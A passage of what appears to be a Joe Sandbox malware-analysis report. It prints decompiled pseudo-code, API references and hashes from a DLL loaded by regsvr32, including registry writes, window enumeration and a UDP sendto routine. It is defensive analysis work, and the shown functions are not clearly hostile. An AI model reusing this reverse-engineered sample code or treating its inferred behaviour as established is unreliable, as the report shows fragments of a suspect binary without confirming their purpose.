				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
					E10016DF0( &_v24, 0x10, "%d", _a12);
					_t18 = WritePrivateProfileStringA(_t29, _t24,  &_v24,  *(__ecx + 0x68));
				} else {
					_t30 = E10013ED1(__ecx, _t29);
					if(_t30 != 0) {
						_t21 = RegSetValueExA(_t30, _t24, 0, 4,  &_a12, 4);
						_t29 = _t21;
						RegCloseKey(_t30);
						_t18 = 0 | _t21 == 0x00000000;
					}
				}
				return E100167D5(_t18, _t24, _v8 ^ _t31, _t28, _t29, _t30);
			}

0x10013f17
0x10013f1d
0x10013f24
0x10013f28
0x10013f2c
0x10013f33
0x10013f36
0x10013f76
0x10013f87
0x10013f38
0x10013f3e
0x10013f42
0x10013f50
0x10013f57
0x10013f59
0x10013f63
0x10013f63
0x10013f42
0x10013f9b

APIs

RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 10013F50
RegCloseKey.ADVAPI32(00000000), ref: 10013F59
_swprintf.LIBCMT ref: 10013F76
WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 10013F87

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ClosePrivateProfileStringValueWrite_swprintf
String ID:
API String ID: 4210924919-0
Opcode ID: 72724b54134d1e17f7023dcd4e88edc389080316b6c32af13a85a47034679497
Instruction ID: 30a1eb16c1be1d822a6ca59f9e75d62d608c78195c8382286e316af6553577e2
Opcode Fuzzy Hash: 72724b54134d1e17f7023dcd4e88edc389080316b6c32af13a85a47034679497
Instruction Fuzzy Hash: 25018076900219BBDB00DF648C85FAF77BCEF48754F104469FA01AB181DA74E94597A4

Uniqueness

Uniqueness Score: -1.00%

Function 1000B244, Relevance: 6.0, APIs: 4, Instructions: 50
windowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E1000B244(void* __ecx, void* __edi, void* __ebp, signed int _a4) {
				void* __ebx;
				void* __esi;
				void* _t16;
				int _t17;
				int _t18;
				struct HWND__* _t19;
				intOrPtr _t25;
				intOrPtr _t33;
				void* _t35;

				_t32 = __edi;
				_t35 = __ecx;
				_t25 =  *((intOrPtr*)(__ecx + 0xc));
				if(_t25 == 0) {
					__eflags =  *((intOrPtr*)(__ecx + 0x14));
					if(__eflags == 0) {
						L3:
						_t17 = E1000A0DB(0, _t25, _t32, _t35, _t39);
						L4:
						asm("sbb edx, edx");
						_t18 = EnableMenuItem( *(_t25 + 4), _t17, ( ~_a4 & 0xfffffffd) + 0x00000003 | 0x00000400);
						L11:
						 *((intOrPtr*)(_t35 + 0x18)) = 1;
						return _t18;
					}
					__eflags = _a4;
					if(_a4 == 0) {
						_push(__edi);
						_t33 =  *((intOrPtr*)(__ecx + 0x14));
						_t19 = GetFocus();
						__eflags = _t19 -  *(_t33 + 0x20);
						if(_t19 ==  *(_t33 + 0x20)) {
							SendMessageA( *(E1000FB5C(0, _t25, __ebp, GetParent( *(_t33 + 0x20))) + 0x20), 0x28, 0, 0);
						}
					}
					_t18 = E10012913( *((intOrPtr*)(_t35 + 0x14)), _a4);
					goto L11;
				}
				if( *((intOrPtr*)(__ecx + 0x10)) == 0) {
					_t17 =  *(__ecx + 8);
					_t39 = _t17 -  *((intOrPtr*)(__ecx + 0x20));
					if(_t17 <  *((intOrPtr*)(__ecx + 0x20))) {
						goto L4;
					}
					goto L3;
				}
				return _t16;
			}

0x1000b244
0x1000b246
0x1000b248
0x1000b24f
0x1000b284
0x1000b287
0x1000b25e
0x1000b25e
0x1000b263
0x1000b269
0x1000b27c
0x1000b2c7
0x1000b2c7
0x00000000
0x1000b2c7
0x1000b289
0x1000b28d
0x1000b28f
0x1000b290
0x1000b293
0x1000b299
0x1000b29c
0x1000b2b4
0x1000b2b4
0x1000b2ba
0x1000b2c2
0x00000000
0x1000b2c2
0x1000b254
0x1000b256
0x1000b259
0x1000b25c
0x00000000
0x00000000
0x00000000
0x1000b25c
0x1000b2d0

APIs

EnableMenuItem.USER32 ref: 1000B27C

Part of subcall function 1000A0DB: __CxxThrowException@8.LIBCMT ref: 1000A0EF
Part of subcall function 1000A0DB: __EH_prolog3.LIBCMT ref: 1000A0FC

GetFocus.USER32 ref: 1000B293
GetParent.USER32(?), ref: 1000B2A1
SendMessageA.USER32 ref: 1000B2B4

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: EnableException@8FocusH_prolog3ItemMenuMessageParentSendThrow
String ID:
API String ID: 3849708097-0
Opcode ID: 716c6444658c0fcd22857925786988681d98949d7d446b879da325b0eb7e7aaf
Instruction ID: 6f1bf2e13571d4607552996c72993327e3919edcc1f96bcd7a145644f4ad6856
Opcode Fuzzy Hash: 716c6444658c0fcd22857925786988681d98949d7d446b879da325b0eb7e7aaf
Instruction Fuzzy Hash: FB115B71500A11AFE720DF64CCC9D1EBBF6FF893A5B118A2DF186869A8C731AC45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 1001044A, Relevance: 6.0, APIs: 4, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E1001044A(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, int _a12, long _a16, struct HWND__* _a20, struct HWND__* _a24) {
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t16;
				struct HWND__* _t18;
				struct HWND__* _t20;
				void* _t22;
				void* _t23;
				void* _t24;
				struct HWND__* _t25;

				_t23 = __ecx;
				_t22 = __ebx;
				_t24 = GetTopWindow;
				_t16 = GetTopWindow(_a4);
				while(1) {
					_t25 = _t16;
					if(_t25 == 0) {
						break;
					}
					__eflags = _a24;
					if(__eflags == 0) {
						SendMessageA(_t25, _a8, _a12, _a16);
					} else {
						_t20 = E1000FB83(_t23, _t24, _t25, __eflags, _t25);
						__eflags = _t20;
						if(__eflags != 0) {
							_push(_a16);
							_push(_a12);
							_push(_a8);
							_push( *((intOrPtr*)(_t20 + 0x20)));
							_push(_t20);
							E1001016F(_t22, _t24, _t25, __eflags);
						}
					}
					__eflags = _a20;
					if(_a20 != 0) {
						_t18 = GetTopWindow(_t25);
						__eflags = _t18;
						if(_t18 != 0) {
							E1001044A(_t22, _t23, _t25, _a8, _a12, _a16, _a20, _a24);
						}
					}
					_t16 = GetWindow(_t25, 2);
				}
				return _t16;
			}

0x1001044a
0x1001044a
0x10010452
0x10010458
0x100104bb
0x100104bb
0x100104bf
0x00000000
0x00000000
0x1001045c
0x10010460
0x1001048a
0x10010462
0x10010463
0x10010468
0x1001046a
0x1001046c
0x1001046f
0x10010472
0x10010475
0x10010478
0x10010479
0x10010479
0x1001046a
0x10010490
0x10010494
0x10010497
0x10010499
0x1001049b
0x100104ad
0x100104ad
0x1001049b
0x100104b5
0x100104b5
0x100104c4

APIs

GetTopWindow.USER32(00000000), ref: 10010458
GetTopWindow.USER32(00000000), ref: 10010497
GetWindow.USER32(00000000,00000002), ref: 100104B5

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: bfa56acb45854e1eb2d8939f4edd14d374eedcc28d24ff6845afa1ef48a187dc
Instruction ID: cb0d0bbe13ee34529c330f041d0b53c98759dff42d13bab1c22f515cd31b8fc3
Opcode Fuzzy Hash: bfa56acb45854e1eb2d8939f4edd14d374eedcc28d24ff6845afa1ef48a187dc
Instruction Fuzzy Hash: CD01257620061ABBDF12DF908C44E9F3A6AEF08390F018014FE8458060C7B6D9A2EBA5

Uniqueness

Uniqueness Score: -1.00%

Function 100223DD, Relevance: 6.0, APIs: 4, Instructions: 48
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E100223DD(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;
				void* _t29;

				_t28 = __ebx;
				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E10021CDA(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E10021DC6(_t28, _t29, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E100222E5(_t29, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E1002222C(_t29, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x100223dd
0x100223e0
0x100223e6
0x10022459
0x00000000
0x100223ed
0x100223ed
0x100223f0
0x1002240b
0x1002240e
0x1002242e
0x10022440
0x10022410
0x10022410
0x10022413
0x00000000
0x10022415
0x10022427
0x10022427
0x10022413
0x1002245e
0x10022462
0x100223f2
0x1002240a
0x1002240a
0x100223f0

APIs

__cftof_l.LIBCMT ref: 10022401

Part of subcall function 1002222C: __fltout2.LIBCMT ref: 10022256

__cftog_l.LIBCMT ref: 10022427
__cftoe_l.LIBCMT ref: 10022459

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
Instruction ID: 8dbc0b72f00ea763734ae0c8b1a7260823f108f727578f4f2c9ad294c4834352
Opcode Fuzzy Hash: 7ea3a893bf3bd11cad7cd0372379ff1f7e327c259811a7a92178e9d3a0fb71f7
Instruction Fuzzy Hash: 4201287A40014ABBCF12AEC4EC41CEE3F66FB18294B958515FE1858531D236D9B2AB81

Uniqueness

Uniqueness Score: -1.00%

Function 1000FE47, Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E1000FE47(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t9;
				struct HWND__* _t10;
				void* _t14;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;
				void* _t18;

				_t14 = __ecx;
				_t13 = __ebx;
				_t9 = GetDlgItem(_a4, _a8);
				_t15 = GetTopWindow;
				_t16 = _t9;
				if(_t16 == 0) {
					L6:
					_t10 = GetTopWindow(_a4);
					while(1) {
						_t17 = _t10;
						__eflags = _t17;
						if(_t17 == 0) {
							goto L10;
						}
						_t10 = E1000FE47(_t13, _t14, _t17, _a8, _a12);
						__eflags = _t10;
						if(_t10 == 0) {
							_t10 = GetWindow(_t17, 2);
							continue;
						}
						goto L10;
					}
				} else {
					if(GetTopWindow(_t16) == 0) {
						L3:
						_push(_t16);
						if(_a12 == 0) {
							return E1000FB5C(_t13, _t14, _t18);
						}
						_t10 = E1000FB83(_t14, _t15, _t16, __eflags);
						__eflags = _t10;
						if(_t10 == 0) {
							goto L6;
						}
					} else {
						_t10 = E1000FE47(__ebx, _t14, _t16, _a8, _a12);
						if(_t10 == 0) {
							goto L3;
						}
					}
				}
				L10:
				return _t10;
			}

0x1000fe47
0x1000fe47
0x1000fe52
0x1000fe58
0x1000fe5e
0x1000fe62
0x1000fe92
0x1000fe95
0x1000feb2
0x1000feb2
0x1000feb4
0x1000feb6
0x00000000
0x00000000
0x1000fea0
0x1000fea5
0x1000fea7
0x1000feac
0x00000000
0x1000feac
0x00000000
0x1000fea7
0x1000fe64
0x1000fe69
0x1000fe7b
0x1000fe7f
0x1000fe80
0x00000000
0x1000fe82
0x1000fe89
0x1000fe8e
0x1000fe90
0x00000000
0x00000000
0x1000fe6b
0x1000fe72
0x1000fe79
0x00000000
0x00000000
0x1000fe79
0x1000fe69
0x1000febb
0x1000febb

APIs

GetDlgItem.USER32 ref: 1000FE52
GetTopWindow.USER32(00000000), ref: 1000FE65

Part of subcall function 1000FE47: GetWindow.USER32(00000000,00000002), ref: 1000FEAC

GetTopWindow.USER32(?), ref: 1000FE95

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: c12eecb807ab7f0029ae595babd55ab8876d87e96eec09ecdb4c3faaf2806783
Instruction ID: 3243c1bb31c4da8a8ed3b9d60ce207d24ba739ee5e1db1414c8eeda74806f304
Opcode Fuzzy Hash: c12eecb807ab7f0029ae595babd55ab8876d87e96eec09ecdb4c3faaf2806783
Instruction Fuzzy Hash: 07018F374016AAB7EB229F60CC00AAF3A98EF447D0F018018FD049153AD731DA12BAA0

Uniqueness

Uniqueness Score: -1.00%

Function 1001D6BC, Relevance: 6.0, APIs: 4, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E1001D6BC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x1002fae0);
				E1001984C(__ebx, __edi, __esi);
				_t31 = E1001BF79(__edx, __edi, _t35);
				_t15 =  *0x1005826c; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E1001A549(0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x10058170; // 0x4b81300
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x10057d48;
								if(__eflags != 0) {
									_push(_t33);
									E10016380(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x10058170; // 0x4b81300
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x10058170; // 0x4b81300
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E1001D757();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E10017DA6(_t25, _t29, _t31, 0x20);
				}
				return E10019891(_t33);
			}

0x1001d6bc
0x1001d6bc
0x1001d6bc
0x1001d6bc
0x1001d6be
0x1001d6c3
0x1001d6cd
0x1001d6cf
0x1001d6d7
0x1001d6f8
0x1001d6fe
0x1001d702
0x1001d705
0x1001d708
0x1001d70e
0x1001d710
0x1001d712
0x1001d715
0x1001d71b
0x1001d71d
0x1001d71f
0x1001d725
0x1001d727
0x1001d728
0x1001d72d
0x1001d725
0x1001d71d
0x1001d72e
0x1001d733
0x1001d736
0x1001d73c
0x1001d740
0x1001d740
0x1001d746
0x1001d74d
0x1001d6df
0x1001d6df
0x1001d6df
0x1001d6e4
0x1001d6e8
0x1001d6ed
0x1001d6f5

APIs

Part of subcall function 1001BF79: __getptd_noexit.LIBCMT ref: 1001BF7A
Part of subcall function 1001BF79: __amsg_exit.LIBCMT ref: 1001BF87

__amsg_exit.LIBCMT ref: 1001D6E8
__lock.LIBCMT ref: 1001D6F8
InterlockedDecrement.KERNEL32(?), ref: 1001D715
InterlockedIncrement.KERNEL32(04B81300), ref: 1001D740

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
String ID:
API String ID: 2880340415-0
Opcode ID: c820c896aabaa0a2095c39d05bd9b26938a44304a92efda62120de517e880afa
Instruction ID: ba7e7af5003a78fddfad0021ce05134b2f36e9a59f0d2c47ef46babd1389d2ef
Opcode Fuzzy Hash: c820c896aabaa0a2095c39d05bd9b26938a44304a92efda62120de517e880afa
Instruction Fuzzy Hash: 95016D39904A21EBEB41FB65988679D77A4FF05790F11410AE804AF291DB34E9C2CB95

Uniqueness

Uniqueness Score: -1.00%

Function 10001360, Relevance: 6.0, APIs: 4, Instructions: 40
networkCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E10001360(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				short _v20;
				short _v22;
				char _v24;
				intOrPtr _v28;
				signed int _t15;
				short _t18;
				intOrPtr _t31;
				signed int _t33;

				_t15 =  *0x10057a08; // 0x7d1a16f8
				_v8 = _t15 ^ _t33;
				_v28 = __ecx;
				_t18 = E100174D0(_t31,  &_v24, 0, 0x10);
				_v24 = 2;
				__imp__#11(_a4);
				_v20 = _t18;
				__imp__#9(_a8);
				_v22 = _t18;
				__imp__#20(_a12, _a16, 0,  &_v24, 0x10);
				return E100167D5(_v28, __ebx, _v8 ^ _t33, _a12, _t31, __esi,  *((intOrPtr*)(_v28 + 0x24)));
			}

0x10001366
0x1000136d
0x10001370
0x1000137b
0x10001383
0x1000138d
0x10001393
0x1000139b
0x100013a1
0x100013bc
0x100013cf

APIs

_memset.LIBCMT ref: 1000137B
inet_addr.WS2_32(?), ref: 1000138D
htons.WS2_32(?), ref: 1000139B
sendto.WS2_32(?,?,00000002,00000000,00000002,00000010), ref: 100013BC

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: _memsethtonsinet_addrsendto
String ID:
API String ID: 1158618643-0
Opcode ID: 55dc4d04b4578ce397bb679e501a1161249c23db44447d4e71df0ac46d681eb6
Instruction ID: 4ca8e198367322d4385a70dad1c3d41f0382a071c465ebc2c9307440f54d584b
Opcode Fuzzy Hash: 55dc4d04b4578ce397bb679e501a1161249c23db44447d4e71df0ac46d681eb6
Instruction Fuzzy Hash: D0017CB590020DABDB00DFA4CC86EAE77B8FF48300F104419F905AB281EB70AA40DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1000CCD3, Relevance: 6.0, APIs: 4, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000CCD3() {
				intOrPtr _t16;
				struct HWND__* _t19;
				intOrPtr _t23;
				intOrPtr* _t28;
				void* _t29;

				_t28 =  *((intOrPtr*)(_t29 - 0x20));
				_t23 =  *((intOrPtr*)(_t29 - 0x24));
				if( *((intOrPtr*)(_t29 - 0x28)) != 0) {
					E10012913(_t23, 1);
				}
				if( *((intOrPtr*)(_t29 - 0x2c)) != 0) {
					EnableWindow( *(_t29 - 0x14), 1);
				}
				if( *(_t29 - 0x14) != 0) {
					_t19 = GetActiveWindow();
					_t34 = _t19 -  *((intOrPtr*)(_t28 + 0x20));
					if(_t19 ==  *((intOrPtr*)(_t28 + 0x20))) {
						SetActiveWindow( *(_t29 - 0x14));
					}
				}
				 *((intOrPtr*)( *_t28 + 0x60))();
				E1000C6E6(_t23, _t28, 0, _t28, _t34);
				if( *((intOrPtr*)(_t28 + 0x58)) != 0) {
					FreeResource( *(_t29 - 0x18));
				}
				_t16 =  *((intOrPtr*)(_t28 + 0x44));
				return E10017C60(_t16);
			}

0x1000ccd3
0x1000ccd6
0x1000ccde
0x1000cce4
0x1000cce4
0x1000ccec
0x1000ccf3
0x1000ccf3
0x1000ccfc
0x1000ccfe
0x1000cd04
0x1000cd07
0x1000cd0c
0x1000cd0c
0x1000cd07
0x1000cd16
0x1000cd1b
0x1000cd23
0x1000cd28
0x1000cd28
0x1000cd2e
0x1000cd36

APIs

EnableWindow.USER32(?,00000001), ref: 1000CCF3
GetActiveWindow.USER32 ref: 1000CCFE
SetActiveWindow.USER32(?,?,00000024,100014EC,00000000,7D1A16F8), ref: 1000CD0C
FreeResource.KERNEL32(?,?,00000024,100014EC,00000000,7D1A16F8), ref: 1000CD28

Part of subcall function 10012913: EnableWindow.USER32(?,7D1A16F8), ref: 10012920

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$ActiveEnable$FreeResource
String ID:
API String ID: 253586258-0
Opcode ID: 5728dce3dbdb708f9e7fb54369dca357d78a73ff54a3e2536421aa2b19b7c5fa
Instruction ID: b9d50a594c6b72ab84edc47d27728691b22d7b2ae70339502ef362fb55dd66ce
Opcode Fuzzy Hash: 5728dce3dbdb708f9e7fb54369dca357d78a73ff54a3e2536421aa2b19b7c5fa
Instruction Fuzzy Hash: 97F04F3890071DDBEF12DB64C98599DBBF2FF48781B60002AE442722A5CB326D81DF51

Uniqueness

Uniqueness Score: -1.00%

Function 1000AD21, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E1000AD21(void* __ecx) {
				signed int _v8;
				char _v16;
				char _v18;
				char _v280;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				long _t14;
				intOrPtr _t15;
				char* _t18;
				intOrPtr _t21;
				intOrPtr _t33;
				signed int _t36;

				_t11 =  *0x10057a08; // 0x7d1a16f8
				_v8 = _t11 ^ _t36;
				_t35 = 0x104;
				_t14 = GetModuleFileNameA( *(__ecx + 0x44),  &_v280, 0x104);
				if(_t14 == 0 || _t14 == 0x104) {
					L4:
					_t15 = 0;
					__eflags = 0;
				} else {
					_t18 = PathFindExtensionA( &_v280);
					_t35 = "%s.dll";
					asm("movsd");
					asm("movsw");
					_t32 =  &_v280;
					_t41 = _t18 -  &_v280 + 7 - 0x106;
					asm("movsb");
					_t33 = _t33;
					if(_t18 -  &_v280 + 7 > 0x106) {
						goto L4;
					} else {
						E1000A7B3(_t21,  &_v280, _t33, "%s.dll", _t36, _t18,  &_v18 - _t18,  &_v16);
						_t15 = E1000AA3A(_t21,  &_v280, _t33, "%s.dll", _t41,  &_v280);
					}
				}
				return E100167D5(_t15, _t21, _v8 ^ _t36, _t32, _t33, _t35);
			}

0x1000ad2a
0x1000ad31
0x1000ad37
0x1000ad47
0x1000ad4f
0x1000ada6
0x1000ada6
0x1000ada6
0x1000ad55
0x1000ad5d
0x1000ad63
0x1000ad6b
0x1000ad6c
0x1000ad70
0x1000ad7b
0x1000ad81
0x1000ad82
0x1000ad83
0x00000000
0x1000ad85
0x1000ad90
0x1000ad9f
0x1000ad9f
0x1000ad83
0x1000adb4

APIs

GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 1000AD47
PathFindExtensionA.SHLWAPI(?), ref: 1000AD5D

Part of subcall function 1000A7B3: _strcpy_s.LIBCMT ref: 1000A7BF

Part of subcall function 1000AA3A: __EH_prolog3.LIBCMT ref: 1000AA59
Part of subcall function 1000AA3A: GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 1000AA7A
Part of subcall function 1000AA3A: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 1000AA8B
Part of subcall function 1000AA3A: ConvertDefaultLocale.KERNEL32(?), ref: 1000AAC1
Part of subcall function 1000AA3A: ConvertDefaultLocale.KERNEL32(?), ref: 1000AAC9
Part of subcall function 1000AA3A: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 1000AADD
Part of subcall function 1000AA3A: ConvertDefaultLocale.KERNEL32(?), ref: 1000AB01
Part of subcall function 1000AA3A: ConvertDefaultLocale.KERNEL32(000003FF), ref: 1000AB07
Part of subcall function 1000AA3A: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 1000AB40

Strings

%s.dll, xrefs: 1000AD63

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3HandlePath_strcpy_s
String ID: %s.dll
API String ID: 3444012488-3668843792
Opcode ID: 6c30b6a237bf11204af5acb5ac5b7830e50b8e52d34c93bd03a652aa76484c2b
Instruction ID: a3b0371864cf8cb86b39257a88ab5a21b33b2e0076ae9bf6281b2400efea00f1
Opcode Fuzzy Hash: 6c30b6a237bf11204af5acb5ac5b7830e50b8e52d34c93bd03a652aa76484c2b
